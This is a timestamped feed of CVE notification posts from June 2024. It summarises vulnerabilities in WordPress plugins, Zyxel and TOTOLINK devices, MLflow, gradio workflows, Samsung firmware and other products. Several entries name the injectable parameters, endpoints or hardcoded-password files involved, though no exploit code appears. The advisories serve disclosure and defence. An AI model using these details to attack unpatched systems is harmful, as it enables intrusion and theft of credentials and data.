| 2024-06-04 19:37:43 |
🚨 CVE-2017-17919SQL injection vulnerability in the 'order' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id desc' parameter. NOTE: The vendor disputes this issue because the documentation states that this method is not intended for use with untrusted input🎖@cveNotify |
|
| 2024-06-04 19:37:39 |
🚨 CVE-2017-9857An issue was discovered in SMA Solar Technology products. The SMAdata2+ communication protocol does not properly use authentication with encryption: it is vulnerable to man in the middle, packet injection, and replay attacks. Any setting change, authentication packet, scouting packet, etc. can be replayed, injected, or used for a man in the middle session. All functionalities available in Sunny Explorer can effectively be done from anywhere within the network as long as an attacker gets the packet setup correctly. This includes the authentication process for all (including hidden) access levels and the changing of settings in accordance with the gained access rights. Furthermore, because the SMAdata2+ communication channel is unencrypted, an attacker capable of understanding the protocol can eavesdrop on communications. NOTE: the vendor's position is that authentication with encryption is not required on an isolated subnetwork. Also, only Sunny Boy TLST-21 and TL-21 and Sunny Tripower TL-10 and TL-30 could potentially be affected🎖@cveNotify |
|
| 2024-06-04 19:37:38 |
🚨 CVE-2017-9855An issue was discovered in SMA Solar Technology products. A secondary authentication system is available for Installers called the Grid Guard system. This system uses predictable codes, and a single Grid Guard code can be used on any SMA inverter. Any such code, when combined with the installer account, allows changing very sensitive parameters. NOTE: the vendor reports that Grid Guard is not an authentication feature; it is only a tracing feature. Also, only Sunny Boy TLST-21 and TL-21 and Sunny Tripower TL-10 and TL-30 could potentially be affected🎖@cveNotify |
|
| 2024-06-04 19:37:37 |
🚨 CVE-2017-9441Multiple cross-site scripting (XSS) vulnerabilities in BigTree CMS through 4.2.18 allow remote authenticated users to inject arbitrary web script or HTML by uploading a crafted package, triggering mishandling of the (1) title or (2) version or (3) author_name parameter in manifest.json. This issue exists in core\admin\modules\developer\extensions\install\unpack.php and core\admin\modules\developer\packages\install\unpack.php. NOTE: the vendor states "You must implicitly trust any package or extension you install as they all have the ability to write PHP files.🎖@cveNotify |
|
| 2024-06-04 19:37:33 |
🚨 CVE-2017-7305Riverbed RiOS through 9.6.0 does not require a bootloader password, which makes it easier for physically proximate attackers to defeat the secure-vault protection mechanism via a crafted boot. NOTE: the vendor believes that this does not meet the definition of a vulnerability. The product contains correct computational logic for a bootloader password; however, this password is optional to meet different customers' needs🎖@cveNotify |
|
| 2024-06-04 19:37:32 |
🚨 CVE-2013-3245plugins/demux/libmkv_plugin.dll in VideoLAN VLC Media Player 2.0.7, and possibly other versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted MKV file, possibly involving an integer overflow and out-of-bounds read or heap-based buffer overflow, or an uncaught exception. NOTE: the vendor disputes the severity and claimed vulnerability type of this issue, stating "This PoC crashes VLC, indeed, but does nothing more... this is not an integer overflow error, but an uncaught exception and I doubt that it is exploitable. This uncaught exception makes VLC abort, not execute random code, on my Linux 64bits machine." A PoC posted by the original researcher shows signs of an attacker-controlled out-of-bounds read, but the affected instruction does not involve a register that directly influences control flow🎖@cveNotify |
|
| 2024-06-04 19:37:27 |
🚨 CVE-2010-5160Race condition in ESET Smart Security 4.2.35.3 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-06-04 19:37:26 |
🚨 CVE-2007-3484Cross-site scripting (XSS) vulnerability in search.php in Google Custom Search Engine allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: this issue is disputed by the Google Security Team, who states that "Google does not provide the 'search.php' script referenced. When a user creates a custom search engine, we provide them with a block of javascript to include on their site. Some users write additional code around this block of javascript to further customize their website.🎖@cveNotify |
|
| 2024-06-04 17:37:26 |
🚨 CVE-2024-1102A vulnerability was found in jberet-core logging. An exception in 'dbProperties' might display user credentials such as the username and password for the database-connection.🎖@cveNotify |
|
| 2024-06-04 17:37:25 |
🚨 CVE-2024-1233A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.🎖@cveNotify |
|
| 2024-06-04 17:37:24 |
🚨 CVE-2020-15778scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."🎖@cveNotify |
|
| 2024-06-04 17:07:43 |
🚨 CVE-2024-29975** UNSUPPORTED WHEN ASSIGNED **The improper privilege management vulnerability in the SUID executable binary in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an authenticated local attacker with administrator privileges to execute some system commands as the “root” user on a vulnerable device.🎖@cveNotify |
|
| 2024-06-04 17:07:42 |
🚨 CVE-2024-29972** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-04 17:07:41 |
🚨 CVE-2023-28492Missing Authorization vulnerability in CodePeople CP Multi View Event Calendar allows Functionality Misuse.This issue affects CP Multi View Event Calendar: from n/a through 1.4.10.🎖@cveNotify |
|
| 2024-06-04 17:07:38 |
🚨 CVE-2023-27460Missing Authorization vulnerability in CodePeople, paypaldev CP Contact Form with Paypal allows Functionality Misuse.This issue affects CP Contact Form with Paypal: from n/a through 1.3.34.🎖@cveNotify |
|
| 2024-06-04 17:07:37 |
🚨 CVE-2023-26523Missing Authorization vulnerability in CodePeople Calculated Fields Form allows Functionality Misuse.This issue affects Calculated Fields Form: from n/a through 1.1.120.🎖@cveNotify |
|
| 2024-06-04 17:07:36 |
🚨 CVE-2023-24373External Control of Assumed-Immutable Web Parameter vulnerability in WpDevArt Booking calendar, Appointment Booking System allows Manipulating Hidden Fields.This issue affects Booking calendar, Appointment Booking System: from n/a through 3.2.3.🎖@cveNotify |
|
| 2024-06-04 17:07:32 |
🚨 CVE-2023-23738Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in Brainstorm Force Spectra allows Content Spoofing, Phishing.This issue affects Spectra: from n/a through 2.3.0.🎖@cveNotify |
|
| 2024-06-04 17:07:31 |
🚨 CVE-2024-36782TOTOLINK CP300 V2.0.4-B20201102 was discovered to contain a hardcoded password vulnerability in /etc/shadow.sample, which allows attackers to log in as root.🎖@cveNotify |
|
| 2024-06-04 17:07:30 |
🚨 CVE-2024-36783TOTOLINK LR350 V9.3.5u.6369_B20220309 was discovered to contain a command injection via the host_time parameter in the NTPSyncWithHost function.🎖@cveNotify |
|
| 2024-06-04 17:07:26 |
🚨 CVE-2024-31682Incorrect access control in the fingerprint authentication mechanism of Phone Cleaner: Boost & Clean v2.2.0 allows attackers to bypass fingerprint authentication due to the use of a deprecated API.🎖@cveNotify |
|
| 2024-06-04 17:07:25 |
🚨 CVE-2023-51219A deep link validation issue in KakaoTalk 10.4.3 allowed a remote adversary to direct users to run any attacker-controller JavaScript within a WebView. The impact was further escalated by triggering another WebView that leaked its access token in a HTTP request header. Ultimately, this access token could be used to takeover another user's account and read her/his chat messages.🎖@cveNotify |
|
| 2024-06-04 15:37:38 |
🚨 CVE-2024-36550idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admin/vpsCompany_deal.php?mudi=add&nohrefStr=close🎖@cveNotify |
|
| 2024-06-04 15:37:37 |
🚨 CVE-2024-36548idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via admin/vpsCompany_deal.php?mudi=del🎖@cveNotify |
|
| 2024-06-04 15:37:36 |
🚨 CVE-2024-36547idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/vpsClass_deal.php?mudi=add🎖@cveNotify |
|
| 2024-06-04 15:37:32 |
🚨 CVE-2024-35653Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in visualcomposer.Com Visual Composer Website Builder allows Stored XSS.This issue affects Visual Composer Website Builder: from n/a through 45.8.0.🎖@cveNotify |
|
| 2024-06-04 15:37:31 |
🚨 CVE-2024-35652Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Saso Nikolov Event Tickets with Ticket Scanner allows Reflected XSS.This issue affects Event Tickets with Ticket Scanner: from n/a through 2.3.1.🎖@cveNotify |
|
| 2024-06-04 15:37:30 |
🚨 CVE-2024-35649Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pdfcrowd Save as PDF plugin by Pdfcrowd allows Stored XSS.This issue affects Save as PDF plugin by Pdfcrowd: from n/a through 3.2.3.🎖@cveNotify |
|
| 2024-06-04 15:37:26 |
🚨 CVE-2024-29004The SolarWinds Platform was determined to be affected by a stored cross-site scripting vulnerability affecting the web console. A high-privileged user and user interaction is required to exploit this vulnerability.🎖@cveNotify |
|
| 2024-06-04 15:37:25 |
🚨 CVE-2024-28996The SolarWinds Platform was determined to be affected by a SWQL Injection Vulnerability. Attack complexity is high for this vulnerability.🎖@cveNotify |
|
| 2024-06-04 15:37:24 |
🚨 CVE-2024-0756The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 lacks validation of URLs when adding iframes, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page.🎖@cveNotify |
|
| 2024-06-04 14:38:04 |
🚨 CVE-2024-35782Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Codeless Cowidgets – Elementor Addons allows Stored XSS.This issue affects Cowidgets – Elementor Addons: from n/a through 1.1.1.🎖@cveNotify |
|
| 2024-06-04 14:38:03 |
🚨 CVE-2024-35668Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Brevo Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue allows Reflected XSS.This issue affects Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue: from n/a through 3.1.77.🎖@cveNotify |
|
| 2024-06-04 14:37:59 |
🚨 CVE-2024-35666Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Themesflat Themesflat Addons For Elementor allows Stored XSS.This issue affects Themesflat Addons For Elementor: from n/a through 2.1.2.🎖@cveNotify |
|
| 2024-06-04 14:37:58 |
🚨 CVE-2024-35655Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Brave Brave Popup Builder allows Stored XSS.This issue affects Brave Popup Builder: from n/a through 0.6.8.🎖@cveNotify |
|
| 2024-06-04 14:37:57 |
🚨 CVE-2024-35634Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Wow-Company Woocommerce – Recent Purchases allows PHP Local File Inclusion.This issue affects Woocommerce – Recent Purchases: from n/a through 1.0.1.🎖@cveNotify |
|
| 2024-06-04 14:37:53 |
🚨 CVE-2024-35629Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Wow-Company Easy Digital Downloads – Recent Purchases allows PHP Remote File Inclusion.This issue affects Easy Digital Downloads – Recent Purchases: from n/a through 1.0.2.🎖@cveNotify |
|
| 2024-06-04 14:37:52 |
🚨 CVE-2024-34552Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Select-Themes Stockholm allows PHP Local File Inclusion.This issue affects Stockholm: from n/a through 9.6.🎖@cveNotify |
|
| 2024-06-04 14:37:51 |
🚨 CVE-2024-34551Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Select-Themes Stockholm allows PHP Local File Inclusion.This issue affects Stockholm: from n/a through 9.6.🎖@cveNotify |
|
| 2024-06-04 14:37:47 |
🚨 CVE-2024-33628Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in XforWooCommerce allows PHP Local File Inclusion.This issue affects XforWooCommerce: from n/a through 2.0.2.🎖@cveNotify |
|
| 2024-06-04 14:37:46 |
🚨 CVE-2024-21683This High severity RCE (Remote Code Execution) vulnerability was introduced in version 5.2 of Confluence Data Center and Server.This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 8.3, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.htmlYou can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives.This vulnerability was found internally.🎖@cveNotify |
|
| 2024-06-04 14:37:45 |
🚨 CVE-2024-1233A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.🎖@cveNotify |
|
| 2024-06-04 12:38:10 |
🚨 CVE-2024-4254The 'deploy-website.yml' workflow in the gradio-app/gradio repository, specifically in the 'main' branch, is vulnerable to secrets exfiltration due to improper authorization. The vulnerability arises from the workflow's explicit checkout and execution of code from a fork, which is unsafe as it allows the running of untrusted code in an environment with access to push to the base repository and access secrets. This flaw could lead to the exfiltration of sensitive secrets such as GITHUB_TOKEN, HF_TOKEN, VERCEL_ORG_ID, VERCEL_PROJECT_ID, COMMENT_TOKEN, AWSACCESSKEYID, AWSSECRETKEY, and VERCEL_TOKEN. The vulnerability is present in the workflow file located at https://github.com/gradio-app/gradio/blob/72f4ca88ab569aae47941b3fb0609e57f2e13a27/.github/workflows/deploy-website.yml.🎖@cveNotify |
|
| 2024-06-04 12:38:09 |
🚨 CVE-2024-37064Deseriliazation of untrusted data can occur in versions 3.7.0 or newer of Ydata's ydata-profiling open-source library, enabling a maliciously crafted dataset to run arbitrary code on an end user's system when loaded.🎖@cveNotify |
|
| 2024-06-04 12:38:05 |
🚨 CVE-2024-37062Deserialization of untrusted data can occur in versions 3.7.0 or newer of Ydata's ydata-profiling open-source library, enabling a malicously crafted report to run arbitrary code on an end user's system when loaded.🎖@cveNotify |
|
| 2024-06-04 12:38:04 |
🚨 CVE-2024-37060Deserialization of untrusted data can occur in versions of the MLflow platform running version 1.27.0 or newer, enabling a maliciously crafted Recipe to execute arbitrary code on an end user’s system when run.🎖@cveNotify |
|
| 2024-06-04 12:38:03 |
🚨 CVE-2024-37059Deserialization of untrusted data can occur in versions of the MLflow platform running version 0.5.0 or newer, enabling a maliciously uploaded PyTorch model to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-06-04 12:38:00 |
🚨 CVE-2024-37058Deserialization of untrusted data can occur in versions of the MLflow platform running version 2.5.0 or newer, enabling a maliciously uploaded Langchain AgentExecutor model to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-06-04 12:37:59 |
🚨 CVE-2024-37056Deserialization of untrusted data can occur in versions of the MLflow platform running version 1.23.0 or newer, enabling a maliciously uploaded LightGBM scikit-learn model to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-06-04 12:37:58 |
🚨 CVE-2024-37054Deserialization of untrusted data can occur in versions of the MLflow platform running version 0.9.0 or newer, enabling a maliciously uploaded PyFunc model to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-06-04 12:37:53 |
🚨 CVE-2024-37053Deserialization of untrusted data can occur in versions of the MLflow platform running version 1.1.0 or newer, enabling a maliciously uploaded scikit-learn model to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-06-04 12:37:52 |
🚨 CVE-2023-49852Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Vsourz Digital Responsive Slick Slider WordPress allows Code Injection.This issue affects Responsive Slick Slider WordPress: from n/a through 1.4.🎖@cveNotify |
|
| 2024-06-04 12:37:51 |
🚨 CVE-2023-49822Exposure of Sensitive Information to an Unauthorized Actor vulnerability in David Vongries Ultimate Dashboard allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Ultimate Dashboard: from n/a through 3.7.10.🎖@cveNotify |
|
| 2024-06-04 12:37:50 |
🚨 CVE-2023-49774Exposure of Sensitive Information to an Unauthorized Actor vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WP Photo Album Plus: from n/a through 8.5.02.005.🎖@cveNotify |
|
| 2024-06-04 11:37:37 |
🚨 CVE-2023-49748Exposure of Sensitive Information to an Unauthorized Actor vulnerability in WPServeur, NicolasKulka, wpformation WPS Hide Login allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WPS Hide Login: from n/a through 1.9.11.🎖@cveNotify |
|
| 2024-06-04 11:37:33 |
🚨 CVE-2023-49741Authentication Bypass by Spoofing vulnerability in wpdevart Coming soon and Maintenance mode allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Coming soon and Maintenance mode: from n/a through 3.7.3.🎖@cveNotify |
|
| 2024-06-04 11:37:32 |
🚨 CVE-2023-48747Improper Authentication vulnerability in Pluggabl LLC Booster for WooCommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Booster for WooCommerce: from n/a through 7.1.2.🎖@cveNotify |
|
| 2024-06-04 11:37:31 |
🚨 CVE-2023-48745Improper Restriction of Excessive Authentication Attempts vulnerability in WebFactory Ltd Captcha Code allows Functionality Bypass.This issue affects Captcha Code: from n/a through 2.9.🎖@cveNotify |
|
| 2024-06-04 11:37:30 |
🚨 CVE-2023-48335Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Webcraftic Hide login page allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Hide login page: from n/a through 1.1.9.🎖@cveNotify |
|
| 2024-06-04 11:37:26 |
🚨 CVE-2023-48290Improper Restriction of Excessive Authentication Attempts vulnerability in 10Web Form Builder Team Form Maker by 10Web allows Functionality Bypass.This issue affects Form Maker by 10Web: from n/a through 1.15.20.🎖@cveNotify |
|
| 2024-06-04 11:37:25 |
🚨 CVE-2023-48276Improper Restriction of Excessive Authentication Attempts vulnerability in Nitin Rathod WP Forms Puzzle Captcha allows Functionality Bypass.This issue affects WP Forms Puzzle Captcha: from n/a through 4.1.🎖@cveNotify |
|
| 2024-06-04 11:37:24 |
🚨 CVE-2023-48271Authentication Bypass by Spoofing vulnerability in yonifre Maspik – Spam blacklist allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Maspik – Spam blacklist: from n/a through 0.10.3.🎖@cveNotify |
|
| 2024-06-04 10:37:59 |
🚨 CVE-2024-5463A vulnerability regarding buffer copy without checking the size of input ('Classic Buffer Overflow') has been found in the login component. This allows remote attackers to conduct denial-of-service attacks via unspecified vectors. This attack only affects the login service which will automatically restart. The following models with Synology Camera Firmware versions before 1.1.1-0383 may be affected: BC500 and TC500.🎖@cveNotify |
|
| 2024-06-04 10:37:58 |
🚨 CVE-2024-4637The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.7.10 due to insufficient input sanitization and output escaping on the user supplied Elementor 'wrapperid' and 'zindex' display attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-04 10:37:54 |
🚨 CVE-2023-47818Exposure of Sensitive Information to an Unauthorized Actor vulnerability in LWS LWS Hide Login allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects LWS Hide Login: from n/a through 2.1.8.🎖@cveNotify |
|
| 2024-06-04 10:37:53 |
🚨 CVE-2023-47663Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Menno Luitjes Foyer allows Code Injection.This issue affects Foyer: from n/a through 1.7.5.🎖@cveNotify |
|
| 2024-06-04 10:37:52 |
🚨 CVE-2023-47513Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in ARI Soft ARI Stream Quiz allows Code Injection.This issue affects ARI Stream Quiz: from n/a through 1.3.2.🎖@cveNotify |
|
| 2024-06-04 10:37:48 |
🚨 CVE-2023-46630Improper Authentication vulnerability in wpase Admin and Site Enhancements (ASE) allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Admin and Site Enhancements (ASE): from n/a through 5.7.1.🎖@cveNotify |
|
| 2024-06-04 10:37:47 |
🚨 CVE-2023-45635Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in WP Darko Responsive Tabs allows Code Injection.This issue affects Responsive Tabs: from n/a before 4.0.6.🎖@cveNotify |
|
| 2024-06-04 10:37:46 |
🚨 CVE-2023-45053Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in pluginever WP Content Pilot – Autoblogging & Affiliate Marketing Plugin allows Code Injection.This issue affects WP Content Pilot – Autoblogging & Affiliate Marketing Plugin: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-06-04 09:37:26 |
🚨 CVE-2024-5000An unauthenticated remote attacker can use a malicious OPC UA client to send a crafted request to affected CODESYS products which can cause a DoS due to incorrect calculation of buffer size.🎖@cveNotify |
|
| 2024-06-04 09:37:25 |
🚨 CVE-2023-5751A local attacker with low privileges can read and modify any users files and cause a DoS in the working directory of the affected products due to exposure of resource to wrong sphere.🎖@cveNotify |
|
| 2024-06-04 09:37:24 |
🚨 CVE-2023-45009Improper Restriction of Excessive Authentication Attempts vulnerability in Forge12 Interactive GmbH Captcha/Honeypot for Contact Form 7 allows Functionality Bypass.This issue affects Captcha/Honeypot for Contact Form 7: from n/a through 1.11.3.🎖@cveNotify |
|
| 2024-06-04 08:37:44 |
🚨 CVE-2024-5421Missing input validation and OS command integration of the input in the utnserver Pro, utnserver ProMAX, INU-100 web-interface allows authenticated command injection.This issue affects utnserver Pro, utnserver ProMAX, INU-100 version 20.1.22 and below.🎖@cveNotify |
|
| 2024-06-04 08:37:40 |
🚨 CVE-2024-5420Missing input validation in the SEH Computertechnik utnserver Pro, SEH Computertechnik utnserver ProMAX, SEH Computertechnik INU-100 web-interface allows stored Cross-Site Scripting (XSS)..This issue affects utnserver Pro, utnserver ProMAX, INU-100 version 20.1.22 and below.🎖@cveNotify |
|
| 2024-06-04 08:37:39 |
🚨 CVE-2024-4253A command injection vulnerability exists in the gradio-app/gradio repository, specifically within the 'test-functional.yml' workflow. The vulnerability arises due to improper neutralization of special elements used in a command, allowing for unauthorized modification of the base repository or secrets exfiltration. The issue affects versions up to and including '@gradio/video@0.6.12'. The flaw is present in the workflow's handling of GitHub context information, where it echoes the full name of the head repository, the head branch, and the workflow reference without adequate sanitization. This could potentially lead to the exfiltration of sensitive secrets such as 'GITHUB_TOKEN', 'COMMENT_TOKEN', and 'CHROMATIC_PROJECT_TOKEN'.🎖@cveNotify |
|
| 2024-06-04 08:37:38 |
🚨 CVE-2023-44235Improper Restriction of Excessive Authentication Attempts vulnerability in Devnath verma WP Captcha allows Functionality Bypass.This issue affects WP Captcha: from n/a through 2.0.0.🎖@cveNotify |
|
| 2024-06-04 08:37:37 |
🚨 CVE-2023-41134Authentication Bypass by Spoofing vulnerability in pluginkollektiv Antispam Bee allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Antispam Bee: from n/a through 2.11.3.🎖@cveNotify |
|
| 2024-06-04 08:37:33 |
🚨 CVE-2023-40673: Improper Control of Interaction Frequency vulnerability in cartpauj Cartpauj Register Captcha allows Functionality Misuse.This issue affects Cartpauj Register Captcha: from n/a through 1.0.02.🎖@cveNotify |
|
| 2024-06-04 08:37:32 |
🚨 CVE-2023-40332Improper Control of Interaction Frequency vulnerability in Lester ‘GaMerZ’ Chan WP-PostRatings allows Functionality Misuse.This issue affects WP-PostRatings: from n/a through 1.91.🎖@cveNotify |
|
| 2024-06-04 08:37:31 |
🚨 CVE-2023-38520External Control of Assumed-Immutable Web Parameter vulnerability in PINPOINT.WORLD Pinpoint Booking System allows Functionality Misuse.This issue affects Pinpoint Booking System: from n/a through 2.9.9.3.4.🎖@cveNotify |
|
| 2024-06-04 08:30:04 |
None |
|
| 2024-06-04 07:37:43 |
🚨 CVE-2024-5485The SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Trigger Link shortcode in all versions up to, and including, 1.0.47 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-04 07:37:42 |
🚨 CVE-2024-20886Arbitrary directory creation in Samsung Live Wallpaper PC prior to version 3.3.8.0 allows attacker to create arbitrary directory.🎖@cveNotify |
|
| 2024-06-04 07:37:41 |
🚨 CVE-2024-20884Incorrect use of privileged API vulnerability in getSemBatteryUsageStats in BatteryStatsService prior to SMR Jun-2024 Release 1 allows local attackers to use privileged API.🎖@cveNotify |
|
| 2024-06-04 07:37:37 |
🚨 CVE-2024-20882Out-of-bounds read vulnerability in bootloader prior to SMR June-2024 Release 1 allows physical attackers to arbitrary data access.🎖@cveNotify |
|
| 2024-06-04 07:37:36 |
🚨 CVE-2024-20880Stack-based buffer overflow vulnerability in bootloader prior to SMR Jun-2024 Release 1 allows physical attackers to overwrite memory.🎖@cveNotify |
|
| 2024-06-04 07:37:35 |
🚨 CVE-2024-20879Improper input validation vulnerability in libsavscmn.so prior to SMR Jun-2024 Release 1 allows local attackers to write out-of-bounds memory.🎖@cveNotify |
|
| 2024-06-04 07:37:32 |
🚨 CVE-2024-20878Heap out-of-bound write vulnerability in parsing grid image in libsavscmn.so prior to SMR June-2024 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-06-04 07:37:31 |
🚨 CVE-2024-20875Improper caller verification vulnerability in SemClipboard prior to SMR June-2024 Release 1 allows local attackers to access arbitrary files.🎖@cveNotify |
|
| 2024-06-04 07:37:30 |
🚨 CVE-2024-20874Improper access control vulnerability in SmartManagerCN prior to SMR Jun-2024 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2024-06-04 07:37:26 |
🚨 CVE-2024-20873Improper input validation vulnerability in caminfo driver prior to SMR Jun-2024 Release 1 allows local privileged attackers to write out-of-bounds memory.🎖@cveNotify |
|
| 2024-06-04 07:37:25 |
🚨 CVE-2023-33930Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates) allows Code Injection.This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.66.🎖@cveNotify |
|
| 2024-06-04 06:37:43 |
🚨 CVE-2024-4997The WPUpper Share Buttons plugin for WordPress is vulnerable to unauthorized access of data when preparing sharing links for posts and pages in all versions up to, and including, 3.43. This makes it possible for unauthenticated attackers to obtain the contents of password protected posts and pages.🎖@cveNotify |
|
| 2024-06-04 06:37:42 |
🚨 CVE-2024-4856The FS Product Inquiry WordPress plugin through 1.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users🎖@cveNotify |
|
| 2024-06-04 06:37:41 |
🚨 CVE-2024-4749The wp-eMember WordPress plugin before 10.3.9 does not sanitize and escape the "fieldId" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.🎖@cveNotify |
|
| 2024-06-04 06:37:37 |
🚨 CVE-2024-4462The Nafeza Prayer Time plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-06-04 06:37:36 |
🚨 CVE-2024-4273The Essential Real Estate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ere_property_map' shortcode in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-04 06:37:35 |
🚨 CVE-2024-4180The Events Calendar WordPress plugin before 6.4.0.1 does not properly sanitize user-submitted content when rendering some views via AJAX.🎖@cveNotify |
|
| 2024-06-04 06:37:32 |
🚨 CVE-2024-4057The Gutenberg Blocks with AI by Kadence WP WordPress plugin before 3.2.37 does not validate and escape some of its block attributes before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-06-04 06:37:31 |
🚨 CVE-2024-3230The Download Attachments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'download-attachments' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-04 06:37:30 |
🚨 CVE-2024-2470The Simple Ajax Chat WordPress plugin before 20240412 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-06-04 06:37:26 |
